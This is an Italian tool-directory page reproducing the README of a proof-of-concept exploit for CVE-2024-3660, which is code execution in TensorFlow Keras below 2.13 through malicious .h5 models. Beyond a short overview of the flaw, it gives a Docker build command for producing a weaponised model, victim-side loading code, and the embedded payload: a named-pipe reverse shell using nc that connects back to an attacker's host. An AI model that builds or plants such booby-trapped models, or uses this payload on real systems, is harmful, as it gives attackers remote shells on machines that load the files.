Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3660-PoC — A PoC per CVE-2024-3660. Esecuzione di codice arbitrario in Keras. | Kitploit
Strumenti/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
Analisi delle VulnerabilitàExploitPenetration TestingSviluppo PayloadSicurezza dell'IABinary Exploitation
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

A PoC per CVE-2024-3660. Esecuzione di codice arbitrario in Keras.

Vedi Repository
41151 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-3660 – Esecuzione di codice arbitrario in TensorFlow Keras tramite modello malintenzionato

Panoramica

CVE-2024-3660 è una vulnerabilità di esecuzione di codice arbitrario nel framework Keras di TensorFlow che interessa le versioni < 2.13.
Consente a un attaccante di incorporare codice Python all'interno di un modello (ad es., tramite un layer Lambda) che viene eseguito automaticamente al caricamento del modello.

Quando un file di modello .h5 malintenzionato viene caricato in un ambiente vulnerabile, i comandi arbitrari vengono eseguiti con gli stessi permessi del processo di caricamento.


Versioni interessate

  • Keras di TensorFlow < 2.13.0
  • Modelli Keras caricati tramite:
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    
o in versioni precedenti di TensorFlow dove safe_mode non è abilitato per impostazione predefinita.

## Descrizione del PoC

Questo PoC utilizza una build basata su Docker per generare un modello hack.h5 malintenzionato contenente un payload di reverse shell.
Quando il modello viene caricato in una versione vulnerabile di TensorFlow, si connette di nuovo alla macchina dell'attaccante.

# Utilizzo
## 1. Build ed Estrazione del Modello Malintenzionato
```bash
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. Caricare il Modello Malintenzionato (Lato Vittima)

  • Su un ambiente TensorFlow vulnerabile (< 2.13):
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

Payload

  • Il payload incorporato utilizza nc per una reverse shell:
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

Riferimenti

NVD CMU Oligo Secuirty

Scarica lo strumento